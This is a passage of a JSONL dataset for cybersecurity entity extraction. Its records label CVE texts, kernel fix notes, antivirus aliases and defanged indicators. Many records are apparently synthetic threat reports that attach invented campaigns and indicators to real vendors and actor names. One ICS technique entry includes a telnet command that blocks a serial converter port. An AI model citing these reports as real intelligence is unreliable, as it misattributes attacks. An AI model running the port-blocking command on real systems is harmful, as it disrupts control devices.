[ . ] 3 [ . ] 1 [ . ] 0 through 8 [ . ] 3 [ . ] 1 [ . 
] 20, LTS2024 release versions 7[.]13[.]1[.]0 through 7[.]13[.]1[.]60 contain an improper neutralization of special elements used in an OS command ('OS command injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution with root privileges.", "spans": {"Vulnerability: CVE-2026-35072": [[0, 14]], "Vulnerability: improper neutralization": [[267, 290]], "Vulnerability: command injection": [[338, 355]], "Vulnerability: arbitrary command": [[475, 492]], "Indicator: 7.7.1.0": [[56, 69]], "Indicator: 8.7.0.0": [[78, 103]], "Indicator: 8.3.1.0": [[130, 155]], "Indicator: 8.3.1.20": [[164, 190]], "Indicator: 7.13.1.0": [[217, 231]], "Indicator: 7.13.1.60": [[240, 255]]}, "info": {"id": "nvd_2026_35072", "source": "defanged_augment"}} {"text": "Blog Post by Check Point Research: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24328 against Citrix NetScaler deployments. The initial access vector involves spear-phishing emails from alert@auth-check[ . ]org delivering Play. Post-compromise, the attackers deploy PikaBot and use Hashcat for reconnaissance. C2 infrastructure includes 126 [ . ] 246 [ . ] 84 [ . ] 247 and nodeproxy[.]club. A staging server at hxxps://datarelay[ . ]net/callback hosts additional tooling. 
Key artifact: /var/tmp/runtime.dll (MD5: c8378e7f469fc81b131edebeb8a63602).", "spans": {"Organization: Check Point Research": [[13, 33]], "Vulnerability: CVE-2020-24328": [[137, 151]], "System: Citrix NetScaler": [[160, 176]], "Indicator: alert@auth-check.org": [[252, 276]], "Malware: Play": [[288, 292]], "Malware: PikaBot": [[332, 339]], "Indicator: 126.246.84.247": [[403, 435]], "Indicator: nodeproxy.club": [[440, 456]], "Indicator: https://datarelay.net/callback": [[478, 512]], "Indicator: c8378e7f469fc81b131edebeb8a63602": [[580, 612]]}, "info": {"id": "synth_v2_01602", "source": "defanged_augment"}} {"text": "Distribution via alternative app stores . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The launcher is a 32-bit DLL named hpqhvsei[ . ]dll , which is the name of a legitimate DLL loaded by hpqhvind[.]exe . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": {"Vulnerability: Microsoft Office vulnerability": [[90, 120]], "Vulnerability: CVE-2017-11882": [[123, 137]], "Indicator: hpqhvsei.dll": [[177, 193]], "Indicator: hpqhvind.exe": [[244, 258]], "Organization: gaming , pharmaceutical , and telecommunications companies": [[537, 595]]}, "info": {"id": "cyberner_stix_train_007054", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetlink: avoid infinite retry looping in netlink_unicast()\n\nnetlink_attachskb() checks for the socket's read memory allocation\nconstraints. Firstly, it has:\n\n rmem < READ_ONCE(sk->sk_rcvbuf)\n\nto check if the just increased rmem value fits into the socket's receive\nbuffer. 
If not, it proceeds and tries to wait for the memory under:\n\n rmem + skb->truesize > READ_ONCE(sk->sk_rcvbuf)\n\nThe checks don't cover the case when skb->truesize + sk->sk_rmem_alloc is\nequal to sk->sk_rcvbuf. Thus the function neither successfully accepts\nthese conditions, nor manages to reschedule the task - and is called in\nretry loop for indefinite time which is caught as:\n\n rcu: INFO: rcu_sched self-detected stall on CPU\n rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212\n (t=26000 jiffies g=230833 q=259957)\n NMI backtrace for cpu 0\n CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014\n Call Trace:\n \n dump_stack lib/dump_stack.c:120\n nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105\n nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62\n rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335\n rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590\n update_process_times kernel/time/timer.c:1953\n tick_sched_handle kernel/time/tick-sched.c:227\n tick_sched_timer kernel/time/tick-sched.c:1399\n __hrtimer_run_queues kernel/time/hrtimer.c:1652\n hrtimer_interrupt kernel/time/hrtimer.c:1717\n __sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113\n asm_call_irq_on_stack arch/x86/entry/entry_64.S:808\n \n\n netlink_attachskb net/netlink/af_netlink.c:1234\n netlink_unicast net/netlink/af_netlink.c:1349\n kauditd_send_queue kernel/audit.c:776\n kauditd_thread kernel/audit.c:897\n kthread kernel/kthread.c:328\n ret_from_fork arch/x86/entry/entry_64.S:304\n\nRestore the original behavior of the check which commit in Fixes\naccidentally missed when restructuring the code.\n\nFound by Linux Verification Center (linuxtesting[.]org).", "spans": {"Indicator: linuxtesting.org": [[2118, 2136]], "System: Linux kernel": [[7, 19]], "System: Linux": [[2091, 2096]], "System: QEMU": [[1013, 1017]]}, "info": {"source": "defanged_augment", 
"cve_id": "CVE-2025-38727"}} {"text": "A backdoor also known as: HW32.Packed.BCC5 W32.Virut.G Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Foreign-502 Trojan.DownLoader11.60294 BehavesLike[ . ]Win32[ . ]Sality[ . ]cc Win32.Virut.eb.368640 Trojan/Win32.Foreign.R131573 Trojan-Ransom.Win32.Foreign", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Sality.cc": [[147, 186]]}, "info": {"id": "cyner2_train_006677", "source": "defanged_augment"}} {"text": "Link embedded in the PDF document : hxxps://csaasd[ . ]egnyte[ . ]com/dd/h5s7YHzOy5 .", "spans": {"Indicator: https://csaasd.egnyte.com/dd/h5s7YHzOy5": [[36, 83]]}, "info": {"id": "cyberner_stix_train_007346", "source": "defanged_augment"}} {"text": "A backdoor also known as: Backdoor/W32.SdBot.25088.Q Backdoor/Afbot.a BKDR_POEBOT.DK Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_POEBOT.DK Backdoor.Win32.Afbot.a Trojan.Win32.Afbot.daze Backdoor.Win32.S.Afbot.25088 Backdoor.W32.Afbot.a!c Backdoor.Win32.Afbot.~A BackDoor.IRC.Afbot Backdoor.Afbot.Win32.1 Backdoor/Afbot.a Trojan[Backdoor]/Win32.Afbot Backdoor:Win32/Afbot.A Backdoor.Win32.Afbot.a Backdoor.Afbot Bck/Iroffer[.]BG Win32.Backdoor.Afbot.Szbp Backdoor.Afbot!ktevPrMqQWw W32/Afbot.A!tr.bdr Win32/Backdoor.BO.3c4", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Iroffer.BG": [[435, 447]]}, "info": {"id": "cyner2_train_003084", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njffs2: check that raw node were preallocated before writing summary\n\nSyzkaller detected a kernel bug in jffs2_link_node_ref, caused by fault\ninjection in jffs2_prealloc_raw_node_refs. 
jffs2_sum_write_sumnode doesn't\ncheck return value of jffs2_prealloc_raw_node_refs and simply lets any\nerror propagate into jffs2_sum_write_data, which eventually calls\njffs2_link_node_ref in order to link the summary to an expectedly allocated\nnode.\n\nkernel BUG at fs/jffs2/nodelist.c:592!\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nCPU: 1 PID: 31277 Comm: syz-executor.7 Not tainted 6.1.128-syzkaller-00139-ge10f83ca10a1 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:jffs2_link_node_ref+0x570/0x690 fs/jffs2/nodelist.c:592\nCall Trace:\n \n jffs2_sum_write_data fs/jffs2/summary.c:841 [inline]\n jffs2_sum_write_sumnode+0xd1a/0x1da0 fs/jffs2/summary.c:874\n jffs2_do_reserve_space+0xa18/0xd60 fs/jffs2/nodemgmt.c:388\n jffs2_reserve_space+0x55f/0xaa0 fs/jffs2/nodemgmt.c:197\n jffs2_write_inode_range+0x246/0xb50 fs/jffs2/write.c:362\n jffs2_write_end+0x726/0x15d0 fs/jffs2/file.c:301\n generic_perform_write+0x314/0x5d0 mm/filemap.c:3856\n __generic_file_write_iter+0x2ae/0x4d0 mm/filemap.c:3973\n generic_file_write_iter+0xe3/0x350 mm/filemap.c:4005\n call_write_iter include/linux/fs.h:2265 [inline]\n do_iter_readv_writev+0x20f/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10c/0x170 fs/splice.c:950\n splice_direct_to_actor+0x337/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFix this issue by checking return value of 
jffs2_prealloc_raw_node_refs\nbefore calling jffs2_sum_write_data.\n\nFound by Linux Verification Center (linuxtesting[.]org) with Syzkaller.", "spans": {"Indicator: linuxtesting.org": [[2291, 2309]], "System: Linux kernel": [[7, 19]], "System: Linux": [[2264, 2269]], "System: QEMU": [[701, 705]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-38194"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 2[.]86[.]251[.]1, the Tenable IR team identified Royal running as /dev/shm/config.dat. The threat actor, believed to be Diamond Sleet, used LinPEAS for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to gatewaysecure[.]org and securelogin[.]xyz. The initial dropper (SHA1: b70269e5f3d8f2fe3eaf7ab72d7ad2600d07ecad) was delivered via a phishing email from billing@account-update[ . ]xyz. A second C2 node was observed at 10[.]213[.]213[.]168, with a persistence mechanism writing to C:\\Users\\Public\\Documents\\sam.hive.", "spans": {"Indicator: 2.86.251.1": [[64, 80]], "Organization: Tenable": [[86, 93]], "Malware: Royal": [[113, 118]], "Indicator: gatewaysecure.org": [[300, 319]], "Indicator: securelogin.xyz": [[324, 341]], "Indicator: b70269e5f3d8f2fe3eaf7ab72d7ad2600d07ecad": [[370, 410]], "Indicator: billing@account-update.xyz": [[452, 482]], "Indicator: 10.213.213.168": [[517, 537]]}, "info": {"id": "synth_v2_00326", "source": "defanged_augment"}} {"text": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. 
\n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10[.]0[.]0[.]1 via Telnet on serial port 1 with the following command: telnet 10 [ . ] 0 [ . ] 0 [ . ] 1 20001.", "spans": {"System: COM": [[39, 42], [143, 146], [269, 272], [298, 301], [365, 368], [495, 498], [598, 601], [825, 828]], "Indicator: 10.0.0.1": [[1191, 1205], [1269, 1295]]}, "info": {"source": "defanged_augment", "mitre_id": "T0805"}} {"text": "The best bet for Readers who want to make sure their phone is n't infected is to scan their phones using the free version of the Lookout Security and Antivirus app . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group . APT33 : 91[.]230[.]121[.]143 remote-server[ . ]ddns[ . ]net . 
The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": {"Organization: Lookout": [[129, 136]], "Organization: Microsoft": [[176, 185]], "Organization: Facebook": [[210, 218]], "Organization: security community": [[237, 255]], "Indicator: 91.230.121.143": [[442, 462]], "Indicator: remote-server.ddns.net": [[463, 493]]}, "info": {"id": "cyberner_stix_train_000146", "source": "defanged_augment"}} {"text": "We hope that this blog post helps other researchers to understand and analyze FinFisher samples and that this industry-wide information-sharing translate to the protection of as many customers as possible . The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea . Based on ESET telemetry , one of the second stage payload delivered to victims is Win64/Winnti[.]BN . Its capabilities include retrieving and executing additional payloads , collecting basic system information , and executing shell commands .", "spans": {"Malware: FinFisher": [[78, 87]], "Organization: ESET": [[399, 403]], "Indicator: Win64/Winnti.BN": [[472, 489]]}, "info": {"id": "cyberner_stix_train_006564", "source": "defanged_augment"}} {"text": "Blog Post by FBI: Tracking Mustang Panda's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-17185 against Progress Telerik deployments. The initial access vector involves spear-phishing emails from notification@identity-verify[.]cc delivering TrickBot. Post-compromise, the attackers deploy PlugX and use Hashcat for reconnaissance. C2 infrastructure includes 192[.]49[.]158[.]221 and syncstatic[.]info. A staging server at hxxps://cache-cache[ . ]site/secure/token hosts additional tooling. 
Key artifact: C:\\Users\\admin\\Downloads\\backdoor.elf (SHA1: b8dff9a2b96073d6395542613017755c30e37bc6).", "spans": {"Organization: FBI": [[13, 16]], "Vulnerability: CVE-2025-17185": [[120, 134]], "System: Progress Telerik": [[143, 159]], "Indicator: notification@identity-verify.cc": [[235, 268]], "Malware: TrickBot": [[280, 288]], "Malware: PlugX": [[328, 333]], "Indicator: 192.49.158.221": [[397, 417]], "Indicator: syncstatic.info": [[422, 439]], "Indicator: https://cache-cache.site/secure/token": [[461, 502]], "Indicator: b8dff9a2b96073d6395542613017755c30e37bc6": [[588, 628]]}, "info": {"id": "synth_v2_01686", "source": "defanged_augment"}} {"text": "Vulnerability in the Oracle Commerce Guided Search / Oracle Commerce Experience Manager product of Oracle Commerce (component: Tools and Frameworks). The supported version that is affected is 11[.]3[.]1[.]5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Commerce Guided Search / Oracle Commerce Experience Manager. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Commerce Guided Search / Oracle Commerce Experience Manager, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Commerce Guided Search / Oracle Commerce Experience Manager accessible data as well as unauthorized read access to a subset of Oracle Commerce Guided Search / Oracle Commerce Experience Manager accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 11.3.1.5": [[192, 206]], "Organization: Oracle": [[21, 27], [53, 59], [99, 105], [315, 321], [347, 353], [500, 506], [532, 538], [733, 739], [765, 771], [867, 873], [899, 905]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-2345"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at /tmp/loader.exe. Memory dump analysis confirmed execution of Metasploit. Registry modifications pointed to persistence via C:\\Users\\admin\\AppData\\Local\\Temp\\lsass.dmp. Network forensics identified connections to 172 [ . ] 39 [ . ] 218 [ . ] 254 and datacloud[ . ]site. Email headers traced the initial vector to helpdesk@secure-verify[.]net. File C:\\Users\\admin\\Downloads\\update.dll (SHA256: ea5b38c145be6e88f5a14b1569e80f6a597f2f297279b70ab2f0b64eb6aa37c6) was identified as the initial dropper. A staging URL hxxps://staticnode[ . ]tech/collect resolved to 90 [ . ] 96 [ . ] 87 [ . ] 30. Secondary artifact hash: SHA256: 1b813fe60298c2d99f225b8fbb2e8a5841b1376ee5daf888c0bb4384ab98a869.", "spans": {"Indicator: 172.39.218.254": [[304, 336]], "Indicator: datacloud.site": [[341, 359]], "Indicator: helpdesk@secure-verify.net": [[404, 432]], "Indicator: ea5b38c145be6e88f5a14b1569e80f6a597f2f297279b70ab2f0b64eb6aa37c6": [[484, 548]], "Indicator: https://staticnode.tech/collect": [[603, 638]], "Indicator: 90.96.87.30": [[651, 680]], "Indicator: 1b813fe60298c2d99f225b8fbb2e8a5841b1376ee5daf888c0bb4384ab98a869": [[715, 779]]}, "info": {"id": "synth_v2_01129", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 3 [ . ] 143 [ . ] 75 [ . ] 180, the Trend Micro IR team identified AsyncRAT running as /opt/app/bin/lsass.dmp. The threat actor, believed to be Aqua Blizzard, used LinPEAS for credential harvesting and Hashcat for lateral movement. 
Exfiltrated data was sent to portalcloud[.]dev and apicdn[.]io. The initial dropper (SHA1: aa931c09f3fd6ee6c496481eb7a977abeffbeb4e) was delivered via a phishing email from billing@secure-verify[ . ]net. A second C2 node was observed at 115 [ . ] 105 [ . ] 226 [ . ] 179, with a persistence mechanism writing to C:\\Windows\\System32\\loader.exe.", "spans": {"Indicator: 3.143.75.180": [[64, 94]], "Organization: Trend Micro": [[100, 111]], "Malware: AsyncRAT": [[131, 139]], "Indicator: portalcloud.dev": [[325, 342]], "Indicator: apicdn.io": [[347, 358]], "Indicator: aa931c09f3fd6ee6c496481eb7a977abeffbeb4e": [[387, 427]], "Indicator: billing@secure-verify.net": [[469, 498]], "Indicator: 115.105.226.179": [[533, 566]]}, "info": {"id": "synth_v2_00281", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-26162 is a critical XXE injection affecting F5 BIG-IP. Kaspersky GReAT confirmed active exploitation by Salt Typhoon in the wild. Exploitation delivers Gootloader (SHA1: 93deeabea0344f7cf74ff9aaf76788eedf317ad2) which is dropped to /home/user/.config/shell.php. The exploit payload is hosted at hxxp://logincloud[.]top/collect and communicates to 192 [ . ] 123 [ . ] 245 [ . ] 129 for C2.", "spans": {"Vulnerability: CVE-2024-26162": [[24, 38]], "Vulnerability: XXE injection": [[53, 66]], "System: F5 BIG-IP": [[77, 86]], "Organization: Kaspersky GReAT": [[88, 103]], "Malware: Gootloader": [[185, 195]], "Indicator: 93deeabea0344f7cf74ff9aaf76788eedf317ad2": [[203, 243]], "Indicator: hxxp://logincloud.top/collect": [[328, 359]], "Indicator: 192.123.245.129": [[380, 413]]}, "info": {"id": "synth_v2_00798", "source": "defanged_augment"}} {"text": "One example of the new Sofacy USBSTEALER modules is 8b238931a7f64fddcad3057a96855f6c , which is named internally as msdetltemp[ . 
]dll .", "spans": {"Indicator: 8b238931a7f64fddcad3057a96855f6c": [[52, 84]], "Indicator: msdetltemp.dll": [[116, 134]]}, "info": {"id": "cyberner_stix_train_003739", "source": "defanged_augment"}} {"text": "APT29, also known as Cozy Bear and tracked by Microsoft as Midnight Blizzard, conducted a phishing campaign targeting European diplomatic entities in Q1 2025. The group distributed malicious ISO files containing a shortcut file that executed a DLL payload via rundll32.exe. The DLL with SHA256 hash f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2 was loaded from C:\\Users\\Public\\Documents\\config.dll. C2 communications were directed to auth-microsoft365[ . ]com and login-sharepoint[ . ]org over HTTPS port 443. The phishing emails were sent from compromised accounts at legitimate organizations and contained links to hxxps://auth-microsoft365[ . ]com/oauth/v2/authorize?client_id=payload. Secondary C2 infrastructure was hosted at 194 [ . ] 58 [ . ] 112 [ . ] 43 and 89[.]34[.]27[.]199. 
The group also deployed Brute Ratel C4 from C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe.", "spans": {"Organization: Microsoft": [[46, 55]], "Indicator: f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[299, 363]], "Indicator: auth-microsoft365.com": [[453, 478]], "Indicator: login-sharepoint.org": [[483, 507]], "Indicator: hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload": [[636, 706]], "Indicator: 194.58.112.43": [[750, 781]], "Indicator: 89.34.27.199": [[786, 804]], "Malware: Brute Ratel C4": [[830, 844]]}, "info": {"id": "malware_00016", "source": "defanged_augment"}} {"text": "Artifact Analysis for RedLine Stealer campaign:\nStage 1 dropper at /tmp/taskhost.exe - SHA256: 666b9995b6355c0b8727da604c0bf6fb505fe2e4fb0e6a5ff2b8c9e77eb48ebd\nStage 2 loader at C:\\Users\\admin\\Downloads\\csrss.exe - MD5: 09d8685246bf38b0ecadfff7aa9c1085\nFinal payload at C:\\Users\\admin\\Downloads\\agent.py - MD5: 478844240b8d53ad45ef53af836e004c\nExfiltration module - SHA1: 7cb6d96d5cd6621b9c2ae28c02684b0ed9f96c0c\nAll stages communicated with 207[.]16[.]62[.]57. LaZagne signatures detected in Stage 2.", "spans": {"Malware: RedLine Stealer": [[22, 37]], "Indicator: 666b9995b6355c0b8727da604c0bf6fb505fe2e4fb0e6a5ff2b8c9e77eb48ebd": [[95, 159]], "Indicator: 09d8685246bf38b0ecadfff7aa9c1085": [[220, 252]], "Indicator: 478844240b8d53ad45ef53af836e004c": [[311, 343]], "Indicator: 7cb6d96d5cd6621b9c2ae28c02684b0ed9f96c0c": [[372, 412]], "Indicator: 207.16.62.57": [[442, 460]]}, "info": {"id": "synth_v2_01995", "source": "defanged_augment"}} {"text": "About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim ’ s online banking account and perform money transfers . PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . 
We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation[.]dot .", "spans": {"Malware: ThreeDollars": [[366, 378]], "Indicator: preparation.dot": [[438, 455]]}, "info": {"id": "cyberner_stix_train_008021", "source": "defanged_augment"}} {"text": "Blog Post by Volexity: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-10212 against Windows 11 deployments. The initial access vector involves spear-phishing emails from support@mail-service[ . ]info delivering Qbot. Post-compromise, the attackers deploy TrickBot and use LaZagne for reconnaissance. C2 infrastructure includes 218[.]22[.]33[.]85 and data-relay[ . ]top. A staging server at hxxps://securegateway[ . ]io/collect hosts additional tooling. Key artifact: C:\\Windows\\System32\\backdoor.elf (MD5: 61cf8b20b132216a0308d730d389c1f1).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2026-10212": [[124, 138]], "System: Windows 11": [[147, 157]], "Indicator: support@mail-service.info": [[233, 262]], "Malware: Qbot": [[274, 278]], "Malware: TrickBot": [[318, 326]], "Indicator: 218.22.33.85": [[390, 408]], "Indicator: data-relay.top": [[413, 431]], "Indicator: https://securegateway.io/collect": [[453, 489]], "Indicator: 61cf8b20b132216a0308d730d389c1f1": [[569, 601]]}, "info": {"id": "synth_v2_01638", "source": "defanged_augment"}} {"text": "IOC Bulletin - RemcosRAT Campaign:\nNetwork Indicators:\n- 192[.]174[.]35[.]182\n- 192[.]246[.]192[.]181\n- 172 [ . ] 82 [ . ] 145 [ . ] 107\n- backup-login[.]club\n- secureupdate[.]info\nURLs:\n- hxxp://loginupdate[ . ]site/wp-content/uploads/doc.php\n- hxxp://gatewayapi[ . ]net/panel/index.html\nEmail Senders:\n- verify@login-portal[.]tech\n- updates@account-update[ . 
]xyz\nFile Indicators:\n- SHA256: 358c3b3fdb9b39b987052c0916bce1e09d32012ba9cca92ad694a80bd24f87e2\n- SHA1: 8d1e8918e2c323b9814ea59555065674e74267e0\n- Drop path: C:\\Users\\admin\\Downloads\\lsass.dmp", "spans": {"Malware: RemcosRAT": [[15, 24]], "Indicator: 192.174.35.182": [[57, 77]], "Indicator: 192.246.192.181": [[80, 101]], "Indicator: 172.82.145.107": [[104, 136]], "Indicator: backup-login.club": [[139, 158]], "Indicator: secureupdate.info": [[161, 180]], "Indicator: hxxp://loginupdate.site/wp-content/uploads/doc.php": [[189, 243]], "Indicator: http://gatewayapi.net/panel/index.html": [[246, 288]], "Indicator: verify@login-portal.tech": [[306, 332]], "Indicator: updates@account-update.xyz": [[335, 365]], "Indicator: 358c3b3fdb9b39b987052c0916bce1e09d32012ba9cca92ad694a80bd24f87e2": [[393, 457]], "Indicator: 8d1e8918e2c323b9814ea59555065674e74267e0": [[466, 506]]}, "info": {"id": "synth_v2_01455", "source": "defanged_augment"}} {"text": "Scattered Spider has compromised cloud environments by exploiting CVE-2023-22515 in Atlassian Confluence and using social engineering to defeat Okta multi-factor authentication. The threat actor deploys the ALPHV/BlackCat ransomware after establishing persistence. Mandiant observed the group using Fleetdeck[.]io and AnyDesk for remote access. CISA recommends reviewing Okta system logs and Azure Active Directory sign-in logs for anomalous activity.", "spans": {"Vulnerability: CVE-2023-22515": [[66, 80]], "System: Atlassian Confluence": [[84, 104]], "System: Okta": [[144, 148], [371, 375]], "Malware: BlackCat": [[213, 221]], "Organization: Mandiant": [[265, 273]], "Organization: CISA": [[345, 349]], "System: Azure Active Directory": [[392, 414]], "Indicator: Fleetdeck.io": [[299, 313]]}, "info": {"id": "cisa_00024", "source": "defanged_augment"}} {"text": "Huntress detected a multi-stage attack chain. The initial phishing email from ceo@account-update[.]xyz contained a link to hxxp://node-proxy[ . ]org/portal/verify. 
This redirected to hxxps://cdn-mail[ . ]cc/secure/token on mailsecure[.]cc. A secondary email from noreply@secure-verify[ . ]net pointed to hxxps://cachenode[.]club/secure/token which delivered SmokeLoader. The final payload callback was hxxps://storageapi[ . ]io/collect resolving to 51 [ . ] 65 [ . ] 156 [ . ] 37 via syncdata[.]top.", "spans": {"Organization: Huntress": [[0, 8]], "Indicator: ceo@account-update.xyz": [[78, 102]], "Indicator: http://node-proxy.org/portal/verify": [[123, 162]], "Indicator: hxxps://cdn-mail.cc/secure/token": [[183, 219]], "Indicator: mailsecure.cc": [[223, 238]], "Indicator: noreply@secure-verify.net": [[263, 292]], "Indicator: hxxps://cachenode.club/secure/token": [[304, 341]], "Malware: SmokeLoader": [[358, 369]], "Indicator: https://storageapi.io/collect": [[402, 435]], "Indicator: 51.65.156.37": [[449, 479]], "Indicator: syncdata.top": [[484, 498]]}, "info": {"id": "synth_v2_01828", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Play (SHA256: 85763adb54f4ac53b92d3da8ae72ff630a2b80b25b11896e68daf48e16f3c351). Upon execution on Ivanti Connect Secure, the sample creates C:\\Users\\admin\\Downloads\\chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 154 [ . ] 211 [ . ] 146 [ . ] 56 every 60 seconds and DNS queries to syncmail[.]club. The second stage was fetched from hxxps://node-update[ . ]top/portal/verify and written to C:\\Users\\admin\\AppData\\Local\\Temp\\chrome_helper.exe. The payload uses PowerShell Empire-style techniques for defense evasion. 
A secondary hash (MD5: 2c97181e571b3ddb46e6082847ef63f3) was extracted from the unpacked payload.", "spans": {"Malware: Play": [[25, 29]], "Indicator: 85763adb54f4ac53b92d3da8ae72ff630a2b80b25b11896e68daf48e16f3c351": [[39, 103]], "System: Ivanti Connect Secure": [[124, 145]], "Indicator: 154.211.146.56": [[284, 316]], "Indicator: syncmail.club": [[353, 368]], "Indicator: https://node-update.top/portal/verify": [[404, 445]], "Indicator: 2c97181e571b3ddb46e6082847ef63f3": [[610, 642]]}, "info": {"id": "synth_v2_00549", "source": "defanged_augment"}} {"text": "Microsoft MSRC detected a multi-stage attack chain. The initial phishing email from info@login-portal[.]tech contained a link to hxxp://auth-sync[.]xyz/callback. This redirected to hxxp://mail-proxy[ . ]info/download/update.exe on staticauth[.]cc. A secondary email from service@mail-service[ . ]info pointed to hxxps://auth-auth[.]dev/portal/verify which delivered DanaBot. The final payload callback was hxxps://staticstatic[.]org/admin/config resolving to 172[.]213[.]162[.]245 via staticcdn[ . ]cc.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Indicator: info@login-portal.tech": [[84, 108]], "Indicator: hxxp://auth-sync.xyz/callback": [[129, 160]], "Indicator: hxxp://mail-proxy.info/download/update.exe": [[181, 227]], "Indicator: staticauth.cc": [[231, 246]], "Indicator: service@mail-service.info": [[271, 300]], "Indicator: https://auth-auth.dev/portal/verify": [[312, 349]], "Malware: DanaBot": [[366, 373]], "Indicator: hxxps://staticstatic.org/admin/config": [[406, 445]], "Indicator: 172.213.162.245": [[459, 480]], "Indicator: staticcdn.cc": [[485, 501]]}, "info": {"id": "synth_v2_01820", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 133 [ . ] 5 [ . ] 87 [ . ] 84, the Trend Micro IR team identified PikaBot running as C:\\Program Files\\Common Files\\beacon.dll. 
